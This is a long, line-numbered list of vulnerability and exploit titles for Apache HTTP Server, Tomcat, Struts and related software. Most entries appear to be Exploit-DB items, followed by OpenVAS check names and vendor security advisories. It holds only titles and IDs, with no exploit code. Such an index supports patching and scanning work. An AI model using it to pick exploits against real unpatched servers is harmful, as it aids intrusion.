14627| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
14628| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
14629| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
14630| [27096] Apache Geronimo 1.0 Error Page XSS
14631| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
14632| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
14633| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
14634| [25986] Plesk Apache Zeroday Remote Exploit
14635| [25980] Apache Struts includeParams Remote Code Execution
14636| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
14637| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
14638| [24874] Apache Struts ParametersInterceptor Remote Code Execution
14639| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
14640| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
14641| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
14642| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
14643| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
14644| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
14645| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
14646| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
14647| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
14648| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
14649| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
14650| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
14651| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
14652| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
14653| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
14654| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
14655| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
14656| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
14657| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
14658| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
14659| [21719] Apache 2.0 Path Disclosure Vulnerability
14660| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
14661| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
14662| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
14663| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
14664| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
14665| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
14666| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
14667| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
14668| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
14669| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
14670| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
14671| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
14672| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
14673| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
14674| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
14675| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
14676| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
14677| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
14678| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
14679| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
14680| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
14681| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
14682| [20558] Apache 1.2 Web Server DoS Vulnerability
14683| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
14684| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
14685| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
14686| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
14687| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
14688| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
14689| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
14690| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
14691| [19231] PHP apache_request_headers Function Buffer Overflow
14692| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
14693| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
14694| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
14695| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
14696| [18442] Apache httpOnly Cookie Disclosure
14697| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
14698| [18221] Apache HTTP Server Denial of Service
14699| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
14700| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
14701| [17691] Apache Struts < 2.2.0 - Remote Command Execution
14702| [16798] Apache mod_jk 1.2.20 Buffer Overflow
14703| [16782] Apache Win32 Chunked Encoding
14704| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
14705| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
14706| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
14707| [15319] Apache 2.2 (Windows) Local Denial of Service
14708| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
14709| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
14710| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
14711| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
14712| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
14713| [12330] Apache OFBiz - Multiple XSS
14714| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
14715| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
14716| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
14717| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
14718| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
14719| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
14720| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
14721| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
14722| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
14723| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
14724| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
14725| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
14726| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
14727| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
14728| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
14729| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
14730| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
14731| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
14732| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
14733| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
14734| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
14735| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
14736| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
14737| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
14738| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
14739| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
14740| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
14741| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
14742| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
14743| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
14744| [466] htpasswd Apache 1.3.31 - Local Exploit
14745| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
14746| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
14747| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
14748| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
14749| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
14750| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
14751| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
14752| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
14753| [9] Apache HTTP Server 2.x Memory Leak Exploit
14754|
14755| OpenVAS (Nessus) - http://www.openvas.org:
14756| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
14757| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
14758| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
14759| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
14760| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
14761| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
14762| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
14763| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
14764| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
14765| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
14766| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
14767| [900571] Apache APR-Utils Version Detection
14768| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
14769| [900496] Apache Tiles Multiple XSS Vulnerability
14770| [900493] Apache Tiles Version Detection
14771| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
14772| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
14773| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
14774| [870175] RedHat Update for apache RHSA-2008:0004-01
14775| [864591] Fedora Update for apache-poi FEDORA-2012-10835
14776| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
14777| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
14778| [864250] Fedora Update for apache-poi FEDORA-2012-7683
14779| [864249] Fedora Update for apache-poi FEDORA-2012-7686
14780| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
14781| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
14782| [855821] Solaris Update for Apache 1.3 122912-19
14783| [855812] Solaris Update for Apache 1.3 122911-19
14784| [855737] Solaris Update for Apache 1.3 122911-17
14785| [855731] Solaris Update for Apache 1.3 122912-17
14786| [855695] Solaris Update for Apache 1.3 122911-16
14787| [855645] Solaris Update for Apache 1.3 122912-16
14788| [855587] Solaris Update for kernel update and Apache 108529-29
14789| [855566] Solaris Update for Apache 116973-07
14790| [855531] Solaris Update for Apache 116974-07
14791| [855524] Solaris Update for Apache 2 120544-14
14792| [855494] Solaris Update for Apache 1.3 122911-15
14793| [855478] Solaris Update for Apache Security 114145-11
14794| [855472] Solaris Update for Apache Security 113146-12
14795| [855179] Solaris Update for Apache 1.3 122912-15
14796| [855147] Solaris Update for kernel update and Apache 108528-29
14797| [855077] Solaris Update for Apache 2 120543-14
14798| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
14799| [850088] SuSE Update for apache2 SUSE-SA:2007:061
14800| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
14801| [841209] Ubuntu Update for apache2 USN-1627-1
14802| [840900] Ubuntu Update for apache2 USN-1368-1
14803| [840798] Ubuntu Update for apache2 USN-1259-1
14804| [840734] Ubuntu Update for apache2 USN-1199-1
14805| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
14806| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
14807| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
14808| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
14809| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
14810| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
14811| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
14812| [835253] HP-UX Update for Apache Web Server HPSBUX02645
14813| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
14814| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
14815| [835236] HP-UX Update for Apache with PHP HPSBUX02543
14816| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
14817| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
14818| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
14819| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
14820| [835188] HP-UX Update for Apache HPSBUX02308
14821| [835181] HP-UX Update for Apache With PHP HPSBUX02332
14822| [835180] HP-UX Update for Apache with PHP HPSBUX02342
14823| [835172] HP-UX Update for Apache HPSBUX02365
14824| [835168] HP-UX Update for Apache HPSBUX02313
14825| [835148] HP-UX Update for Apache HPSBUX01064
14826| [835139] HP-UX Update for Apache with PHP HPSBUX01090
14827| [835131] HP-UX Update for Apache HPSBUX00256
14828| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
14829| [835104] HP-UX Update for Apache HPSBUX00224
14830| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
14831| [835101] HP-UX Update for Apache HPSBUX01232
14832| [835080] HP-UX Update for Apache HPSBUX02273
14833| [835078] HP-UX Update for ApacheStrong HPSBUX00255
14834| [835044] HP-UX Update for Apache HPSBUX01019
14835| [835040] HP-UX Update for Apache PHP HPSBUX00207
14836| [835025] HP-UX Update for Apache HPSBUX00197
14837| [835023] HP-UX Update for Apache HPSBUX01022
14838| [835022] HP-UX Update for Apache HPSBUX02292
14839| [835005] HP-UX Update for Apache HPSBUX02262
14840| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
14841| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
14842| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
14843| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
14844| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
14845| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
14846| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
14847| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
14848| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
14849| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
14850| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
14851| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
14852| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
14853| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
14854| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
14855| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
14856| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
14857| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
14858| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
14859| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
14860| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
14861| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
14862| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
14863| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
14864| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
14865| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
14866| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
14867| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
14868| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
14869| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
14870| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
14871| [801942] Apache Archiva Multiple Vulnerabilities
14872| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
14873| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
14874| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
14875| [801284] Apache Derby Information Disclosure Vulnerability
14876| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
14877| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
14878| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
14879| [800680] Apache APR Version Detection
14880| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
14881| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
14882| [800677] Apache Roller Version Detection
14883| [800279] Apache mod_jk Module Version Detection
14884| [800278] Apache Struts Cross Site Scripting Vulnerability
14885| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
14886| [800276] Apache Struts Version Detection
14887| [800271] Apache Struts Directory Traversal Vulnerability
14888| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
14889| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
14890| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
14891| [103122] Apache Web Server ETag Header Information Disclosure Weakness
14892| [103074] Apache Continuum Cross Site Scripting Vulnerability
14893| [103073] Apache Continuum Detection
14894| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
14895| [101023] Apache Open For Business Weak Password security check
14896| [101020] Apache Open For Business HTML injection vulnerability
14897| [101019] Apache Open For Business service detection
14898| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
14899| [100923] Apache Archiva Detection
14900| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
14901| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
14902| [100813] Apache Axis2 Detection
14903| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
14904| [100795] Apache Derby Detection
14905| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
14906| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
14907| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
14908| [100514] Apache Multiple Security Vulnerabilities
14909| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
14910| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
14911| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
14912| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
14913| [72626] Debian Security Advisory DSA 2579-1 (apache2)
14914| [72612] FreeBSD Ports: apache22
14915| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
14916| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
14917| [71512] FreeBSD Ports: apache
14918| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
14919| [71256] Debian Security Advisory DSA 2452-1 (apache2)
14920| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
14921| [70737] FreeBSD Ports: apache
14922| [70724] Debian Security Advisory DSA 2405-1 (apache2)
14923| [70600] FreeBSD Ports: apache
14924| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
14925| [70235] Debian Security Advisory DSA 2298-2 (apache2)
14926| [70233] Debian Security Advisory DSA 2298-1 (apache2)
14927| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
14928| [69338] Debian Security Advisory DSA 2202-1 (apache2)
14929| [67868] FreeBSD Ports: apache
14930| [66816] FreeBSD Ports: apache
14931| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
14932| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
14933| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
14934| [66081] SLES11: Security update for Apache 2
14935| [66074] SLES10: Security update for Apache 2
14936| [66070] SLES9: Security update for Apache 2
14937| [65998] SLES10: Security update for apache2-mod_python
14938| [65893] SLES10: Security update for Apache 2
14939| [65888] SLES10: Security update for Apache 2
14940| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
14941| [65510] SLES9: Security update for Apache 2
14942| [65472] SLES9: Security update for Apache
14943| [65467] SLES9: Security update for Apache
14944| [65450] SLES9: Security update for apache2
14945| [65390] SLES9: Security update for Apache2
14946| [65363] SLES9: Security update for Apache2
14947| [65309] SLES9: Security update for Apache and mod_ssl
14948| [65296] SLES9: Security update for webdav apache module
14949| [65283] SLES9: Security update for Apache2
14950| [65249] SLES9: Security update for Apache 2
14951| [65230] SLES9: Security update for Apache 2
14952| [65228] SLES9: Security update for Apache 2
14953| [65212] SLES9: Security update for apache2-mod_python
14954| [65209] SLES9: Security update for apache2-worker
14955| [65207] SLES9: Security update for Apache 2
14956| [65168] SLES9: Security update for apache2-mod_python
14957| [65142] SLES9: Security update for Apache2
14958| [65136] SLES9: Security update for Apache 2
14959| [65132] SLES9: Security update for apache
14960| [65131] SLES9: Security update for Apache 2 oes/CORE
14961| [65113] SLES9: Security update for apache2
14962| [65072] SLES9: Security update for apache and mod_ssl
14963| [65017] SLES9: Security update for Apache 2
14964| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
14965| [64783] FreeBSD Ports: apache
14966| [64774] Ubuntu USN-802-2 (apache2)
14967| [64653] Ubuntu USN-813-2 (apache2)
14968| [64559] Debian Security Advisory DSA 1834-2 (apache2)
14969| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
14970| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
14971| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
14972| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
14973| [64443] Ubuntu USN-802-1 (apache2)
14974| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
14975| [64423] Debian Security Advisory DSA 1834-1 (apache2)
14976| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
14977| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
14978| [64251] Debian Security Advisory DSA 1816-1 (apache2)
14979| [64201] Ubuntu USN-787-1 (apache2)
14980| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
14981| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
14982| [63565] FreeBSD Ports: apache
14983| [63562] Ubuntu USN-731-1 (apache2)
14984| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
14985| [61185] FreeBSD Ports: apache
14986| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
14987| [60387] Slackware Advisory SSA:2008-045-02 apache
14988| [58826] FreeBSD Ports: apache-tomcat
14989| [58825] FreeBSD Ports: apache-tomcat
14990| [58804] FreeBSD Ports: apache
14991| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
14992| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
14993| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
14994| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
14995| [57335] Debian Security Advisory DSA 1167-1 (apache)
14996| [57201] Debian Security Advisory DSA 1131-1 (apache)
14997| [57200] Debian Security Advisory DSA 1132-1 (apache2)
14998| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
14999| [57145] FreeBSD Ports: apache
15000| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
15001| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
15002| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
15003| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
15004| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
15005| [56067] FreeBSD Ports: apache
15006| [55803] Slackware Advisory SSA:2005-310-04 apache
15007| [55519] Debian Security Advisory DSA 839-1 (apachetop)
15008| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
15009| [55355] FreeBSD Ports: apache
15010| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
15011| [55261] Debian Security Advisory DSA 805-1 (apache2)
15012| [55259] Debian Security Advisory DSA 803-1 (apache)
15013| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
15014| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
15015| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
15016| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
15017| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
15018| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
15019| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
15020| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
15021| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
15022| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
15023| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
15024| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
15025| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
15026| [54439] FreeBSD Ports: apache
15027| [53931] Slackware Advisory SSA:2004-133-01 apache
15028| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
15029| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
15030| [53878] Slackware Advisory SSA:2003-308-01 apache security update
15031| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
15032| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
15033| [53848] Debian Security Advisory DSA 131-1 (apache)
15034| [53784] Debian Security Advisory DSA 021-1 (apache)
15035| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
15036| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
15037| [53735] Debian Security Advisory DSA 187-1 (apache)
15038| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
15039| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
15040| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
15041| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
15042| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
15043| [53282] Debian Security Advisory DSA 594-1 (apache)
15044| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
15045| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
15046| [53215] Debian Security Advisory DSA 525-1 (apache)
15047| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
15048| [52529] FreeBSD Ports: apache+ssl
15049| [52501] FreeBSD Ports: apache
15050| [52461] FreeBSD Ports: apache
15051| [52390] FreeBSD Ports: apache
15052| [52389] FreeBSD Ports: apache
15053| [52388] FreeBSD Ports: apache
15054| [52383] FreeBSD Ports: apache
15055| [52339] FreeBSD Ports: apache+mod_ssl
15056| [52331] FreeBSD Ports: apache
15057| [52329] FreeBSD Ports: ru-apache+mod_ssl
15058| [52314] FreeBSD Ports: apache
15059| [52310] FreeBSD Ports: apache
15060| [15588] Detect Apache HTTPS
15061| [15555] Apache mod_proxy content-length buffer overflow
15062| [15554] Apache mod_include priviledge escalation
15063| [14771] Apache <= 1.3.33 htpasswd local overflow
15064| [14177] Apache mod_access rule bypass
15065| [13644] Apache mod_rootme Backdoor
15066| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
15067| [12280] Apache Connection Blocking Denial of Service
15068| [12239] Apache Error Log Escape Sequence Injection
15069| [12123] Apache Tomcat source.jsp malformed request information disclosure
15070| [12085] Apache Tomcat servlet/JSP container default files
15071| [11438] Apache Tomcat Directory Listing and File disclosure
15072| [11204] Apache Tomcat Default Accounts
15073| [11092] Apache 2.0.39 Win32 directory traversal
15074| [11046] Apache Tomcat TroubleShooter Servlet Installed
15075| [11042] Apache Tomcat DOS Device Name XSS
15076| [11041] Apache Tomcat /servlet Cross Site Scripting
15077| [10938] Apache Remote Command Execution via .bat files
